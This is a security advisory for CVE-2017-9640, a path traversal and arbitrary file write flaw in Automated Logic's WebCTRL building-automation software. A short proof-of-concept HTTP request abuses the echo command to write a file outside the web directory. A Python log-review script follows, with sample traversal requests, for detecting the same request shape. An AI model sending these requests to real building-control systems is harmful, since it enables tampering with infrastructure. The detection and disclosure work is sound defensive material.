Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write


Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior
                  ALC WebCTRL, i-Vu 6.0 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior

Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.

Desc: The vulnerability is triggered by an authenticated user that can use
the manual command console in the management panel of the affected application.
The ManualCommand() function in ManualCommand.js allows users to perform additional
diagnostics and settings overview by using a pre-defined set of commands. This
can be exploited by using the echo command to write and/or overwrite arbitrary
files on the system including directory traversal throughout the system.

Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.42
           CJServer/1.1
           Java/1.7.0_25-b17
           Java HotSpot Server VM 23.25-b01
           Ant 1.7.0
           Axis 1.4
           Trove 2.0.2
           Xalan Java 2.4.1
           Xerces-J 2.6.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5430
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php

CVE ID: CVE-2017-9640
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640


30.01.2017

--


PoC:

GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1
Host: TARGET

---

GET http://TARGET/touch.txt HTTP/1.1

peend
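
A log-review check for the request shape shown in the PoC, added here as an example and not part of the advisory or of vendor code: it flags manual-command requests whose action is an echo redirected to a file and records whether the target leaves the working directory. The access-log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter name come from the advisory's PoC request.
ENDPOINT = "/_common/servlet/lvl5/manualcommand"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# echo whose output is redirected (> or >>) to a file name.
ECHO_REDIRECT_RE = re.compile(r"^\s*echo\b.*?>{1,2}\s*(.+)$", re.I | re.S)


def classify(log_line):
    """Return None for unrelated lines, else details of the echo file write."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path != ENDPOINT:
        return None
    # parse_qs percent-decodes, so %3E and %5C are matched as '>' and '\'.
    for action in parse_qs(url.query).get("action", []):
        hit = ECHO_REDIRECT_RE.match(action)
        if hit:
            target = hit.group(1).strip()
            # ".." path component, drive letter or leading separator.
            escapes = (".." in re.split(r"[\\/]", target)
                       or re.match(r"(?:[A-Za-z]:|[\\/])", target) is not None)
            return {"target": target, "leaves_dir": escapes}
    return None


def scan(lines):
    """Collect (source address, finding) for every echo-to-file request."""
    return [(l.split()[0], f) for l in lines if (f := classify(l))]


# Constructed sample access-log lines (common-log style, documentation IPs).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Feb/2017:10:00:01 +0000] "GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1" 200 41',
    r'192.0.2.10 - - [01/Feb/2017:10:00:04 +0000] "GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20x%3E%3E..%5C..%5Cnote.txt&id=7332 HTTP/1.1" 200 41',
    r'198.51.100.7 - - [01/Feb/2017:10:02:00 +0000] "GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20x>note.txt&id=7333 HTTP/1.1" 200 41',
    r'198.51.100.7 - - [01/Feb/2017:10:02:09 +0000] "GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20hello&id=7334 HTTP/1.1" 200 64',
    r'198.51.100.7 - - [01/Feb/2017:10:03:00 +0000] "GET /index.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for src, finding in scan(SAMPLE_LOG):
        print(src, finding)
```

The check decodes one layer of percent-encoding only, so it should run on the request line exactly as the server logged it.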